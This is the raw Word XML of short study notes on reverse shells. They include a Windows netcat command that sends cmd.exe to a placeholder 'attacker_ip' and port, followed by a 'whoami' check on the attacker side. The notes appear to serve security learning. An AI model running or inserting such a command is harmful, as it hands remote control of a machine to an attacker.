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95D" w14:textId="19443310" w:rsidR="00853ABF" w:rsidRPr="000F76D0" w:rsidRDefault="00F65C0E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F76D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse Shells</w:t>
      </w:r>
      <w:r w:rsidR="0011041F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (remote shell)</w:t>
      </w:r>
      <w:r w:rsidRPr="000F76D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E51CE" w14:textId="77777777" w:rsidR="00F65C0E" w:rsidRDefault="00F65C0E"/>
    <w:p w14:paraId="6D098B32" w14:textId="695D2689" w:rsidR="0011041F" w:rsidRDefault="0011041F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359C4F9B" wp14:editId="68A30507">
            <wp:extent cx="4255477" cy="1512842"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="888345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5380" name="Picture 8883453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121" cy="15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F15" w14:textId="77777777" w:rsidR="0011041F" w:rsidRDefault="0011041F"/>
    <w:p w14:paraId="10978806" w14:textId="77777777" w:rsidR="0011041F" w:rsidRDefault="0011041F"/>
    <w:p w14:paraId="247AAADE" w14:textId="4C17E759" w:rsidR="00F65C0E" w:rsidRPr="006C1455" w:rsidRDefault="006C1455">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164ADE89" w14:textId="77777777" w:rsidR="006C1455" w:rsidRDefault="006C1455"/>
    <w:p w14:paraId="4F426C6B" w14:textId="39BC9CAC" w:rsidR="006C1455" w:rsidRPr="006C1455" w:rsidRDefault="006C1455">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ON WINDOWS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29176CCB" w14:textId="02B57AC5" w:rsidR="006C1455" w:rsidRDefault="006C1455">
      <w:r>
        <w:t>Nc.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>port_no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172FAEE2" w14:textId="77777777" w:rsidR="006C1455" w:rsidRDefault="006C1455"/>
    <w:p w14:paraId="58D1DB98" w14:textId="77777777" w:rsidR="006C1455" w:rsidRDefault="006C1455"/>
    <w:p w14:paraId="345A4AC1" w14:textId="7A39B0E4" w:rsidR="006C1455" w:rsidRPr="006C1455" w:rsidRDefault="006C1455">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ON KALI (Attacker):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5760EF96" w14:textId="04E91A9F" w:rsidR="006C1455" w:rsidRDefault="006C1455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3B93F6BB" w14:textId="5A7CDF0B" w:rsidR="006C1455" w:rsidRDefault="006C1455">
      <w:r>
        <w:t xml:space="preserve"># we get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E73027" w14:textId="77777777" w:rsidR="006C1455" w:rsidRDefault="006C1455"/>
    <w:p w14:paraId="16B7A0C0" w14:textId="4CA8CE31" w:rsidR="006C1455" w:rsidRDefault="006C1455">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DDB4863" w14:textId="77777777" w:rsidR="006C1455" w:rsidRDefault="006C1455"/>
    <w:p w14:paraId="5FDDB09B" w14:textId="77777777" w:rsidR="006C1455" w:rsidRDefault="006C1455"/>
    <w:p w14:paraId="15D98CCD" w14:textId="77777777" w:rsidR="006C1455" w:rsidRDefault="006C1455"/>
    <w:p w14:paraId="271D6342" w14:textId="7370A99A" w:rsidR="006C1455" w:rsidRPr="006C1455" w:rsidRDefault="006C1455">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6ACC73" w14:textId="636C0A08" w:rsidR="006C1455" w:rsidRDefault="006C1455">
      <w:r>
        <w:t xml:space="preserve">Disadvantage is that the attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B37BED">
        <w:t>needs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be available on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C59D09" w14:textId="6650B1F4" w:rsidR="00B37BED" w:rsidRDefault="00B37BED">
      <w:r>
        <w:t xml:space="preserve">Connection made by target system can be made by any thing not particularly with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B3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DF"/>
    <w:rsid w:val="000F76D0"/>
    <w:rsid w:val="0011041F"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006C1455"/>
    <w:rsid w:val="006E5B83"/>
    <w:rsid w:val="007E1499"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00A17BDF"/>
    <w:rsid w:val="00B37BED"/>
    <w:rsid w:val="00F65C0E"/>
    <w:rsid w:val="00FC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6CCE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8122CF50-B710-42B4-9EA8-0A9E0745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</Words>
  <Characters>303</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>43</Lines>
  <Paragraphs>23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17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-13T07:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-13T08:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>